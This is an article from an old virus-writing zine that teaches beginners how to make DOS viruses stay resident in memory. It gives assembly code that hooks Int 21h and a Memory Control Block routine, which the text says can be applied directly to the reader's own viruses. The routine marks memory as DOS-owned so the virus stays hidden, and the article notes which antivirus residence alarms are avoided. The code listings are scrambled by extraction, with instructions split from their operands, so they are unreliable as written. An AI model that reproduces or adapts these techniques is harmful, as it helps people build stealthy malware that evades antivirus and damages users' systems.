Memory Residence Methods.

----------------------------------------------------------------In this article, I'll try to explain the more common methods
used to make viruses go resident. The focus will be more on the
practical than the theoretical, leaving clear the fundamentals so
that you can take advantage of them, especially in the case of the
MCB. The article will show examples of the two techniques
described which can (in the case of the MCB) be directly applied to
your own viruses. The theory is not very detailed, but everything
a beginner needs to know to use these methods is present. With the
information the article provides, the beginner who wishes to get
deeper into the theory can simply read a guide or manual on memory
residence, since the necessary basics are explained here (I hope).
Let's begin:
The most used methods to make a virus go resident are:
o
those available through DOS or
o
the MCB (Memory Control Block) method.
The former is the simplest way to do it, but also the most
inefficient because it informs DOS it's leaving something behind in
memory. Besides, when you execute this function, control is
returned to DOS. Whatever program you attempt to run will
terminate! The virus which uses this technique must re-execute
itself to avoid exiting to DOS during it's installation into
memory. To remain resident, it executes itself again (service 4bh)
and during it's second execution it hooks Int27h or calls service
31 of Int 21, in it's turn giving control to the "father" program
(the one loaded first). The father program can then end, executing
the host. If this isn't done (like when executing Int 21), control
would be passed to the command interpreter.
One characteristic of viruses which use this technique is that
they tend to attach to the beginning of the file; these services
will resident the amount of required from the beginning of the file
in memory.... If we have a 50K .COM and the virus is at the end,
and we use Int 27 to attempt to leave resident 1K, for example,
what would be placed in memory would be the first K of the COM, not
the virus. Obviously, we can't just leave 50K resident.... we can
make the virus go resident we can move (it?) to another block,
transfer control, and then this will give control to the "father"
program. To avoid all this, many viruses attach themselves to the
beginning of the programs they infect. Of course, this is slow,
since we have to read the whole file and copy it after the virus.
If the virus attaches to the end of the file, we only have to write
the virus, not the virus AND the file. This method is not very
elegant; more than just slow, other things can happen if the
infection places the virus at the beginning........
Below is the source to a TSR, NOT a virus, just a normal TSR to
illustrate how it works. This example hooks Int 21 and then passes
control without doing anything. Code can be added to make it do
what ever you want.
===================================================================
===================================================================
code
segment
assume cs:code,ds:code
org 100h

start:
jmp instalar

;Jump to the installation

;routine.

;We put the original Int21 address in this variable.

old_21
dd 2
new_21:
;Here's the routine which hooks Int 21.
jmp cs:[old_21]

;Jump to the original int.

instalar:
;Obtain the original Int 21 Vector
mov ax, 3521h
int 21h
mov word ptr old_21, bx
mov word ptr old_21+2, es
;Set the new Int 21 vector.
mov
ax,2521h
push cs
pop ds
mov
dx, offset new_21
int
21h
;Now it's
mov
mov
int

resident
ah, 31h
dx, 30d
21h

;<--------- Number of paragraphs(16 bytes)

;leave resident.

code
ends
end start
===================================================================
===================================================================
The second method is a little more complex than simply calling
Int 27h, but it's much more effective. To understand how it works,
you must be aware that DOS creates a control block for each memory
block used. This control block is 16 bytes long (a paragraph)and
is just above the assigned memory block. In a COM file, for
example, CS - 1 contains the address of this block. In offset 3 of
the same we can find the amount of memory used by the program....
To make our program resident, we must subtract from that value the
length of the virus, free up the memory which is no longer used
(service 4ah), and assign it to our program (service 48h). We
finish by marking the MCB of the segment to which we moved our
virus with '8' in offset 1, to fool DOS into not using that part of
memory. When we mark the block we use an '8' to identify it
because DOS uses the same.
The code that follows shows how it's done..... the code will
leave a virus resident from a COM file. To load a virus from an
EXE we must keep in mind that the MCB segment to be modified is
obtained by subtracting 1 from DS, not CS.
===================================================================
===================================================================

;I pass the code segment to AS, I subtract it and pass to ES to

;obtain the amount of memory reserved by the host program (ES:[3]),
;which is in AX.......
mov ax, cs
dec ax

;With this we obtain the MCB segment.

mov es, ax
mov ax, es:[3]

;Here we obtain from the MCB the

;amount of memory used.

;I subtract the length of the virus from the memory used by the
;host and place the result in AX
sub ax, bx

;BX contains the length of the virus

;in paragraphs

;We pass the result of the previous operation to BX so as to then

;call the service which frees memory, with the new size and the
;segment in ES.
push bx
;Save the amount of memory to be reserved
mov bx, ax
;Pass the new amount to BX.
push cs
pop es
mov ah, 4ah
int 21h
;I assign the freed memory to my virus, the assigned memory segment
;goes to AX. I decrease BX because DOS will use one paragraph.
pop
dec
mov
int

bx
bx
ah, 48h
21h

;Pop the amount of memory to be reserved.

;I decrease AX and pass it to ES; that way I point to the paragraph

;DOS uses as a control, I mark the paragraph at offset 1 with an 8
;so that DOS thinks it's a part of itself and not use this part of
;memory. I then increment AX again and pass it to ES, so that ES
;points to the memory the virus will use.
dec
mov
mov
mov
inc
mov

ax
es, ax
word ptr es:[1], 8
word ptr es:[8],'XX'
ax
es, ax

push es

;Optional: name that block.

;Save the address of the virus

;segment.

===================================================================
===================================================================
All that remains is to move the virus to the reserved segment, a
simple matter of doing a "rep movsb" to the segment to which ES
points and that's it, the virus is resident.
NOTE:
The routine by itself does not set off any alarms; TBAV's
residence alarm is set off when it detects a hook to Int 21h or

13h.
Text by Zarathustra for Minotauro Magazine